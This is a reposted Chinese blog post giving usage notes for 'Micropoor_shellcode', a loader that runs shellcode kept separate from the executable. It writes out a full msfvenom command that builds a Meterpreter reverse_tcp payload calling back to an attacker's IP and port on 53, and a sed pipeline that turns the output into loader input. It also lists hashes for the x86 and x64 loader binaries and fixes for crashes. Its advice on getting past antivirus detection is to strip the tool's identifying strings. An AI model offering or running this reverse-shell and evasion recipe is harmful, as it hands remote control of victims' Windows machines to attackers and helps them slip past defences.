Usage:
Micropoor_shellcode port host
E.g
Micropoor_shellcode.exe 4444 192.168.1.5msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=53 -b '\x00' -f c |grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"copy shellcode to Micropoor_box.rb
Micropoor_shellcode_x64.exe:
大小: 136192 字节
修改时间: 2019年1月22日, 4:40:59
MD5: 304F3C23AD6C57714EDB73D93DA6813D
SHA1: 63B213272AADA91A44F965741E3720EE25CAF7C9
CRC32: 4C2FDE0AMicropoor_shellcode_x86.exe:
大小: 117248 字节
修改时间: 2019年1月22日, 2:45:50
MD5: D91444F0A632DEE7F57BAE432CEFFAEC
SHA1: 3D5135FE30FBEFD090B6BBB1F7738DB25B0C2CCC
CRC32: 02BE2833
Micropoor_shellcode.rb
大小: 956 字节
修改时间: 2019年1月22日, 3:13:17
MD5: 9A82AB2C3A39CABC26FC68864DB07BA1
SHA1: 92D6253C88BA10073CD3AAEE8C38C366DFC7761F
CRC32: 97FA3861
目前搜集问题总结:
问题1:程序崩溃1:
shellcode分离加载器分为x86,x64,版本。请对应相关的Micropoor_shellcode.exe。
这里需注意,msfvenom的payload其中windows/messagebox,是分x64与x86的,只是msfvenom本身仅提供了x86版本的shellcode。所以如果需运行messagebox,需要调用Micropoor_shellcode_x86.exe。
程序崩溃2:
如果生成x86或者x64的shellcode,那么msf本身请对应相关位数的payload。
问题2:被查杀:
了解用法后,请去掉Micropoor的字符串字样,或者更改其他字符串即可。
本文转载自亮神原文,本文观点不代表lsh4ck's Blog立场,版权归原作者所有,欢迎分享本文,转载请保留出处!
